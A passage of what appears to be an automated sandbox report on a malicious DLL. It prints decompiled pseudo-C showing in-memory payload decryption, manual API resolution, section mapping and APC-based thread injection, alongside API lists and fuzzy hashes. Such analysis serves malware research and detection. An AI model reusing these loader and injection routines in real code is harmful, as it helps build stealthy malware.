                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                												goto L12;
                                											} else {
                                												goto L11;
                                											}
                                										}
                                									} else {
                                										_t51 = _t51 + _t69;
                                										L11:
                                										_v8 = _t51;
                                									}
                                									_t53 = _v8;
                                									__eflags = _t53;
                                									if(_t53 == 0) {
                                										_t54 = _v24 & 0x0000ffff;
                                									} else {
                                										_t54 = _t53 + 2;
                                									}
                                									_t55 = GetProcAddress(_v28, _t54);
                                									__eflags = _t55;
                                									if(__eflags == 0) {
                                										_v20 = _t59 - 0x63699b44;
                                									} else {
                                										_t68 = _v8;
                                										__eflags = _t68;
                                										if(_t68 != 0) {
                                											 *_t68 = _t59 - 0x63699bc3;
                                										}
                                										 *_v16 = _t55;
                                										_t58 = 0x725990f8 + _t59 * 4;
                                										_t73 = _t73 + _t58;
                                										_t32 =  &_v16;
                                										 *_t32 = _v16 + _t58;
                                										__eflags =  *_t32;
                                										continue;
                                									}
                                									goto L23;
                                								}
                                							} else {
                                								_t50 = _t61;
                                								if(_t61 != 0) {
                                									goto L6;
                                								}
                                							}
                                							L23:
                                							_v12 = _v12 + 0x14;
                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                							if(_t46 != 0) {
                                								continue;
                                							} else {
                                							}
                                							L26:
                                							goto L27;
                                						}
                                						_t60 = _t59 + 0x9c9664bb;
                                						__eflags = _t60;
                                						_v20 = _t60;
                                						goto L26;
                                					}
                                				}
                                				L27:
                                				return _v20;
                                			}





























                                APIs
                                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6DD41FB4
                                • GetProcAddress.KERNEL32(?,00000000), ref: 6DD42026
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2574300362-0
                                • Opcode ID: b08d2ce191eca5cd73949b2d960bc5962f56e7648250e2cdf7207bd198e215d0
                                • Instruction ID: c57f91cf9e5ef87a3a679953a5628a7542a714a4c148ef7bf086679d8a80befe
                                • Opcode Fuzzy Hash: b08d2ce191eca5cd73949b2d960bc5962f56e7648250e2cdf7207bd198e215d0
                                • Instruction Fuzzy Hash: F6313871A4020ADFEB21EF99C880BAEBBF4FF45348B14806AE855E7245E771DA45CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E6DD41EC7(void** __esi, PVOID* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				long _t13;
                                
                                				_v16 = 0;
                                				asm("stosd");
                                				_v8 = 0;
                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                				if(_t13 < 0) {
                                					_push(_t13);
                                					return __esi[6]();
                                				}
                                				return 0;
                                			}








                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6DD41C0E,00000002,00000000,?,?,00000000,?,?,6DD41C0E,00000000), ref: 6DD41EF4
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction ID: 998123a71217bacfc5a48f5d9476e40d63ec7698643626af5cb8a02081897329
                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction Fuzzy Hash: 5BF030B690420CFFEB119FA9CC85C9FBBBDEB44394B108939F652E1090D6309E188B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 80%
                                			E6DD41C7D(intOrPtr _a4) {
                                				char _v28;
                                				struct _SYSTEMTIME _v44;
                                				char _v48;
                                				long _v52;
                                				long _v56;
                                				void* __edi;
                                				long _t21;
                                				int _t23;
                                				long _t26;
                                				long _t27;
                                				long _t31;
                                				void* _t37;
                                				intOrPtr _t39;
                                				intOrPtr _t44;
                                				signed int _t45;
                                				void* _t50;
                                				signed int _t54;
                                				void* _t56;
                                				intOrPtr* _t57;
                                
                                				_t21 = E6DD41F10();
                                				_v52 = _t21;
                                				if(_t21 != 0) {
                                					L18:
                                					return _t21;
                                				} else {
                                					goto L1;
                                				}
                                				do {
                                					L1:
                                					GetSystemTime( &_v44);
                                					_t23 = SwitchToThread();
                                					asm("cdq");
                                					_t45 = 9;
                                					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                					_t26 = E6DD418AD(0, _t54); // executed
                                					_v56 = _t26;
                                					Sleep(_t54 << 5); // executed
                                					_t21 = _v56;
                                				} while (_t21 == 0xc);
                                				if(_t21 != 0) {
                                					goto L18;
                                				}
                                				_t27 = E6DD41ADB(_t45); // executed
                                				_v52 = _t27;
                                				if(_t27 != 0) {
                                					L16:
                                					_t21 = _v52;
                                					if(_t21 == 0xffffffff) {
                                						_t21 = GetLastError();
                                					}
                                					goto L18;
                                				}
                                				if(_a4 != 0) {
                                					L11:
                                					_push(0);
                                					_t56 = E6DD413D1(E6DD414E8,  &_v28);
                                					if(_t56 == 0) {
                                						_v56 = GetLastError();
                                					} else {
                                						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                						_v56 = _t31;
                                						if(_t31 == 0) {
                                							GetExitCodeThread(_t56,  &_v56);
                                						}
                                						CloseHandle(_t56);
                                					}
                                					goto L16;
                                				}
                                				if(E6DD4134F(_t45,  &_v48) != 0) {
                                					 *0x6dd441b8 = 0;
                                					goto L11;
                                				}
                                				_t44 = _v48;
                                				_t57 = __imp__GetLongPathNameW;
                                				_t37 =  *_t57(_t44, 0, 0); // executed
                                				_t50 = _t37;
                                				if(_t50 == 0) {
                                					L9:
                                					 *0x6dd441b8 = _t44;
                                					goto L11;
                                				}
                                				_t15 = _t50 + 2; // 0x2
                                				_t39 = E6DD41B58(_t50 + _t15);
                                				 *0x6dd441b8 = _t39;
                                				if(_t39 == 0) {
                                					goto L9;
                                				} else {
                                					 *_t57(_t44, _t39, _t50); // executed
                                					E6DD4142F(_t44);
                                					goto L11;
                                				}
                                			}























                                APIs
                                  • Part of subcall function 6DD41F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DD41C8E,751463F0,00000000), ref: 6DD41F1F
                                  • Part of subcall function 6DD41F10: GetVersion.KERNEL32 ref: 6DD41F2E
                                  • Part of subcall function 6DD41F10: GetCurrentProcessId.KERNEL32 ref: 6DD41F3D
                                  • Part of subcall function 6DD41F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DD41F56
                                • GetSystemTime.KERNEL32(?,751463F0,00000000), ref: 6DD41CA1
                                • SwitchToThread.KERNEL32 ref: 6DD41CA7
                                  • Part of subcall function 6DD418AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6DD41903
                                  • Part of subcall function 6DD418AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6DD419C9
                                • Sleep.KERNELBASE(00000000,00000000), ref: 6DD41CCA
                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6DD41D12
                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6DD41D30
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,6DD414E8,?,00000000), ref: 6DD41D62
                                • GetExitCodeThread.KERNEL32(00000000,?), ref: 6DD41D76
                                • CloseHandle.KERNEL32(00000000), ref: 6DD41D7D
                                • GetLastError.KERNEL32(6DD414E8,?,00000000), ref: 6DD41D85
                                • GetLastError.KERNEL32 ref: 6DD41D98
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                • String ID:
                                • API String ID: 1962885430-0
                                • Opcode ID: 5d31ad4d692153109710735626727ddff22d293ba22feb269be29fb9d2e9c70c
                                • Instruction ID: e4c1a832c5a590f1d97021c6a589e11912135fe43417cf3821e05724bd7292d1
                                • Opcode Fuzzy Hash: 5d31ad4d692153109710735626727ddff22d293ba22feb269be29fb9d2e9c70c
                                • Instruction Fuzzy Hash: C331A1B1988752ABD710FF698C48A6F77FCAF86354F008A2AF964D2140EB30C45487B2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E6DD41060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v8;
                                				_Unknown_base(*)()* _t29;
                                				_Unknown_base(*)()* _t33;
                                				_Unknown_base(*)()* _t36;
                                				_Unknown_base(*)()* _t39;
                                				_Unknown_base(*)()* _t42;
                                				intOrPtr _t46;
                                				struct HINSTANCE__* _t50;
                                				intOrPtr _t56;
                                
                                				_t56 = E6DD41B58(0x20);
                                				if(_t56 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t50 = GetModuleHandleA( *0x6dd441d0 + 0x6dd45014);
                                					_v8 = 0x7f;
                                					_t29 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd450e1);
                                					 *(_t56 + 0xc) = _t29;
                                					if(_t29 == 0) {
                                						L8:
                                						E6DD4142F(_t56);
                                					} else {
                                						_t33 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd450f1);
                                						 *(_t56 + 0x10) = _t33;
                                						if(_t33 == 0) {
                                							goto L8;
                                						} else {
                                							_t36 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd45104);
                                							 *(_t56 + 0x14) = _t36;
                                							if(_t36 == 0) {
                                								goto L8;
                                							} else {
                                								_t39 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd45119);
                                								 *(_t56 + 0x18) = _t39;
                                								if(_t39 == 0) {
                                									goto L8;
                                								} else {
                                									_t42 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd4512f);
                                									 *(_t56 + 0x1c) = _t42;
                                									if(_t42 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                										_t46 = E6DD41B9C(_t56, _a12); // executed
                                										_v8 = _t46;
                                										if(_t46 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a16 = _t56;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}













                                APIs
                                  • Part of subcall function 6DD41B58: HeapAlloc.KERNEL32(00000000,?,6DD41702,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41B64
                                • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6DD41480,?,?,?,?,00000002,00000000,?,?), ref: 6DD41084
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410A6
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410BC
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410D2
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410E8
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410FE
                                  • Part of subcall function 6DD41B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 6DD41BF9
                                  • Part of subcall function 6DD41B9C: memset.NTDLL ref: 6DD41C1B
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 1632424568-0
                                • Opcode ID: 8bf1687a242c7400f86c7bc04f556055f2f0a9ab0d81bb75b9811f340f8c1a1c
                                • Instruction ID: ff027949f7203d29674ba93cbe0d384c292c9be3eabca9ca5c955b21aa02bcf5
                                • Opcode Fuzzy Hash: 8bf1687a242c7400f86c7bc04f556055f2f0a9ab0d81bb75b9811f340f8c1a1c
                                • Instruction Fuzzy Hash: 3D212BF190060EDFEB10FF69E880E6A77F8EB09744B018525F945D7205E770E9528BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                				long _v8;
                                				void* __edi;
                                				void* __esi;
                                				void* __ebp;
                                				char _t9;
                                				void* _t10;
                                				void* _t18;
                                				void* _t23;
                                				void* _t36;
                                
                                				_push(__ecx);
                                				_t9 = _a8;
                                				_v8 = 1;
                                				if(_t9 == 0) {
                                					_t10 = InterlockedDecrement(0x6dd44188);
                                					__eflags = _t10;
                                					if(_t10 == 0) {
                                						__eflags =  *0x6dd4418c;
                                						if( *0x6dd4418c != 0) {
                                							_t36 = 0x2328;
                                							while(1) {
                                								SleepEx(0x64, 1);
                                								__eflags =  *0x6dd44198;
                                								if( *0x6dd44198 == 0) {
                                									break;
                                								}
                                								_t36 = _t36 - 0x64;
                                								__eflags = _t36;
                                								if(_t36 > 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							CloseHandle( *0x6dd4418c);
                                						}
                                						HeapDestroy( *0x6dd44190);
                                					}
                                				} else {
                                					if(_t9 == 1 && InterlockedIncrement(0x6dd44188) == 1) {
                                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                						_t41 = _t18;
                                						 *0x6dd44190 = _t18;
                                						if(_t18 == 0) {
                                							L6:
                                							_v8 = 0;
                                						} else {
                                							 *0x6dd441b0 = _a4;
                                							asm("lock xadd [eax], edi");
                                							_push( &_a8);
                                							_t23 = E6DD413D1(E6DD420CE, E6DD4121C(_a12, 1, 0x6dd44198, _t41));
                                							 *0x6dd4418c = _t23;
                                							if(_t23 == 0) {
                                								asm("lock xadd [esi], eax");
                                								goto L6;
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}













                                APIs
                                • InterlockedIncrement.KERNEL32(6DD44188), ref: 6DD41DD0
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6DD41DE5
                                  • Part of subcall function 6DD413D1: CreateThread.KERNELBASE ref: 6DD413E8
                                  • Part of subcall function 6DD413D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DD413FD
                                  • Part of subcall function 6DD413D1: GetLastError.KERNEL32(00000000), ref: 6DD41408
                                  • Part of subcall function 6DD413D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6DD41412
                                  • Part of subcall function 6DD413D1: CloseHandle.KERNEL32(00000000), ref: 6DD41419
                                  • Part of subcall function 6DD413D1: SetLastError.KERNEL32(00000000), ref: 6DD41422
                                • InterlockedDecrement.KERNEL32(6DD44188), ref: 6DD41E38
                                • SleepEx.KERNEL32(00000064,00000001), ref: 6DD41E52
                                • CloseHandle.KERNEL32 ref: 6DD41E6E
                                • HeapDestroy.KERNEL32 ref: 6DD41E7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                • String ID:
                                • API String ID: 2110400756-0
                                • Opcode ID: c289817f76375576268b0fcc0a811d79031baa0a721befa88efec89cb1c7e1ef
                                • Instruction ID: a552b3105c71d682f5ec366594bb8c52deb7f3ee05b1766b45df1c44d78f428c
                                • Opcode Fuzzy Hash: c289817f76375576268b0fcc0a811d79031baa0a721befa88efec89cb1c7e1ef
                                • Instruction Fuzzy Hash: 7C219035640206EBEB00BFEDCC84B2A7BB9F75A7A4B108239F555E3141D7709994CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E6DD413D1(long _a4, DWORD* _a12) {
                                				_Unknown_base(*)()* _v0;
                                				void* _t4;
                                				long _t6;
                                				long _t11;
                                				void* _t13;
                                
                                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6dd441cc, 0, _a12); // executed
                                				_t13 = _t4;
                                				if(_t13 != 0) {
                                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                					if(_t6 == 0) {
                                						_t11 = GetLastError();
                                						TerminateThread(_t13, _t11);
                                						CloseHandle(_t13);
                                						_t13 = 0;
                                						SetLastError(_t11);
                                					}
                                				}
                                				return _t13;
                                			}









                                APIs
                                • CreateThread.KERNELBASE ref: 6DD413E8
                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DD413FD
                                • GetLastError.KERNEL32(00000000), ref: 6DD41408
                                • TerminateThread.KERNEL32(00000000,00000000), ref: 6DD41412
                                • CloseHandle.KERNEL32(00000000), ref: 6DD41419
                                • SetLastError.KERNEL32(00000000), ref: 6DD41422
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                • String ID:
                                • API String ID: 3832013932-0
                                • Opcode ID: 439b20c83ffb46f6ffdd4d5226224a8a37d7dc6c06b0f8611e35f12e4ccde602
                                • Instruction ID: 7a954158e222fbe67971443d83b354fca086e74ba38fd77c206156a70f3c7431
                                • Opcode Fuzzy Hash: 439b20c83ffb46f6ffdd4d5226224a8a37d7dc6c06b0f8611e35f12e4ccde602
                                • Instruction Fuzzy Hash: 9BF01C362C5621BBEB227FE89C0CF5BBB79FF0A751F008604F60991150C72188909BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentDirectoryA.KERNEL32(000008DA,6DDCDBC8), ref: 6DD8B691
                                • GetTempPathA.KERNEL32(000008DA,6DDCDBC8), ref: 6DD8BED8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: CurrentDirectoryPathTemp
                                • String ID: $$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 783798388-2545117055
                                • Opcode ID: 34ae90d8b1092dda65b6bb7e79c066e4f8154d147e40e63722fd511b8abd84c0
                                • Instruction ID: f7207cc70d449cf308cbf3bce1faa1f84dc277d83e14723814cf0eea65db916c
                                • Opcode Fuzzy Hash: 34ae90d8b1092dda65b6bb7e79c066e4f8154d147e40e63722fd511b8abd84c0
                                • Instruction Fuzzy Hash: 2482767150A3528FD705EF29C49026ABBF9BF9A314F1A4A2EF49487382E734D509CB52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                • String ID:
                                • API String ID: 3136044242-0
                                • Opcode ID: 6a3cf5487002d1f8c5976509f9bef55b534309e919a90147d62066d4e10cc025
                                • Instruction ID: 620844fcf2cf81d6ce02561c5793b3222dbba721aa15adb0195aaba4b75ee9a7
                                • Opcode Fuzzy Hash: 6a3cf5487002d1f8c5976509f9bef55b534309e919a90147d62066d4e10cc025
                                • Instruction Fuzzy Hash: 84217E71D446A6EFCB136F59C840E7F3A78EBC5A94F124116F81456292E3308D059BE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 90%
                                			E6DD418AD(void* __edi, intOrPtr _a4) {
                                				intOrPtr _v8;
                                				char _v12;
                                				void* _v16;
                                				unsigned int _v20;
                                				intOrPtr _v24;
                                				char _v28;
                                				signed int _v32;
                                				void* _v36;
                                				signed int _v40;
                                				signed char _v44;
                                				void* _v48;
                                				signed int _v56;
                                				signed int _v60;
                                				intOrPtr _t50;
                                				void* _t57;
                                				void* _t61;
                                				signed int _t67;
                                				signed char _t69;
                                				signed char _t70;
                                				void* _t76;
                                				intOrPtr _t77;
                                				unsigned int _t82;
                                				intOrPtr _t86;
                                				intOrPtr* _t89;
                                				intOrPtr _t90;
                                				void* _t91;
                                				signed int _t93;
                                
                                				_t90 =  *0x6dd441b0;
                                				_t50 = E6DD41000(_t90,  &_v28,  &_v20);
                                				_v24 = _t50;
                                				if(_t50 == 0) {
                                					asm("sbb ebx, ebx");
                                					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
                                					_t91 = _t90 + _v28;
                                					_v48 = _t91;
                                					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                                					_t76 = _t57;
                                					_v36 = _t76;
                                					if(_t76 == 0) {
                                						_v24 = 8;
                                					} else {
                                						_t69 = 0;
                                						if(_t67 <= 0) {
                                							_t77 =  *0x6dd441cc;
                                						} else {
                                							_t86 = _a4;
                                							_v8 = _t91;
                                							_v8 = _v8 - _t76;
                                							_t14 = _t86 + 0x6dd45137; // 0x3220a9c2
                                							_t61 = _t57 - _t91 + _t14;
                                							_v16 = _t76;
                                							do {
                                								asm("movsd");
                                								asm("movsd");
                                								asm("movsd");
                                								_t70 = _t69 + 1;
                                								_v44 = _t70;
                                								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
                                								if(_t82 != 0) {
                                									_v32 = _v32 & 0x00000000;
                                									_t89 = _v16;
                                									_v12 = 0x400;
                                									do {
                                										_t93 =  *((intOrPtr*)(_v8 + _t89));
                                										_v40 = _t93;
                                										if(_t93 == 0) {
                                											_v12 = 1;
                                										} else {
                                											 *_t89 = _t93 + _v32 - _t82;
                                											_v32 = _v40;
                                											_t89 = _t89 + 4;
                                										}
                                										_t33 =  &_v12;
                                										 *_t33 = _v12 - 1;
                                									} while ( *_t33 != 0);
                                								}
                                								_t69 = _v44;
                                								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
                                								_v16 = _v16 + 0x1000;
                                								 *0x6dd441cc = _t77;
                                							} while (_t69 < _t67);
                                						}
                                						if(_t77 != 0x63699bc3) {
                                							_v24 = 0xc;
                                						} else {
                                							memcpy(_v48, _v36, _v20);
                                						}
                                						VirtualFree(_v36, 0, 0x8000); // executed
                                					}
                                				}
                                				return _v24;
                                			}































                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6DD41903
                                • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6DD419C9
                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6DD419E4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: Virtual$AllocFreememcpy
                                • String ID: Jun 6 2021
                                • API String ID: 4010158826-1013970402
                                • Opcode ID: bac12ea9750916fe97ec230f5779c9fe0ac5469e8c20e8a8408b648804219bec
                                • Instruction ID: 3e52f038066ad16465e05d56d580ce2adce783f4a0f4d24b5ae3328639be08f4
                                • Opcode Fuzzy Hash: bac12ea9750916fe97ec230f5779c9fe0ac5469e8c20e8a8408b648804219bec
                                • Instruction Fuzzy Hash: 34416871E4020AABEB04EF99C880AEEBBB5BF49310F14C129E9147B244D775AA55CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E6DD420CE(void* __ecx, intOrPtr _a4) {
                                				long _t3;
                                				int _t4;
                                				int _t9;
                                				void* _t13;
                                
                                				_t13 = GetCurrentThread();
                                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                				if(_t3 != 0) {
                                					SetThreadPriority(_t13, 0xffffffff); // executed
                                				}
                                				_t4 = E6DD41C7D(_a4); // executed
                                				_t9 = _t4;
                                				if(_t9 == 0) {
                                					SetThreadPriority(_t13, _t4);
                                				}
                                				asm("lock xadd [eax], ecx");
                                				return _t9;
                                			}








                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6DD420D1
                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6DD420DC
                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6DD420EF
                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6DD42102
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: Thread$Priority$AffinityCurrentMask
                                • String ID:
                                • API String ID: 1452675757-0
                                • Opcode ID: 869d7e88620df4a20aacd3864a2766800083b3dfd29d9961fd91121b05031e0b
                                • Instruction ID: dc1e01dc70b2a25cdaef4612b04c75acc77b2c88e112526cee7a2d239c491284
                                • Opcode Fuzzy Hash: 869d7e88620df4a20aacd3864a2766800083b3dfd29d9961fd91121b05031e0b
                                • Instruction Fuzzy Hash: 8AE092313857126BE7217F2D4CC4F6BABACDF82334B124335F624D22D0CB948C4589A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __RTC_Initialize.LIBCMT ref: 6DD8DD27
                                  • Part of subcall function 6DD8E3BC: RtlInitializeSListHead.NTDLL(6DDCCB40), ref: 6DD8E3C1
                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DD8DD91
                                • ___scrt_fastfail.LIBCMT ref: 6DD8DDDB
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                • String ID:
                                • API String ID: 2097537958-0
                                • Opcode ID: cd3b482e1b14621e454400892b01f3b6b2b754ca5d3ff009ff006de807fb3c98
                                • Instruction ID: 0f524860d0e4d469919bb5f30bdb7e0eb77190417202bce7bfb1ddfc05ba691a
                                • Opcode Fuzzy Hash: cd3b482e1b14621e454400892b01f3b6b2b754ca5d3ff009ff006de807fb3c98
                                • Instruction Fuzzy Hash: 9721CD7258C353EEDB137BB8D8007BC37A59F5226EF11845AF685A71C3CB2350448AB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E6DD4126D(void* __eax, void* _a4) {
                                				signed int _v8;
                                				signed int _v12;
                                				signed int _v16;
                                				long _v20;
                                				int _t43;
                                				long _t54;
                                				signed int _t57;
                                				void* _t58;
                                				signed int _t60;
                                
                                				_v12 = _v12 & 0x00000000;
                                				_t57 =  *0x6dd441cc;
                                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                				_v16 =  *(__eax + 6) & 0x0000ffff;
                                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                				_v8 = _v8 & 0x00000000;
                                				if(_v16 <= 0) {
                                					L12:
                                					return _v12;
                                				} else {
                                					goto L1;
                                				}
                                				while(1) {
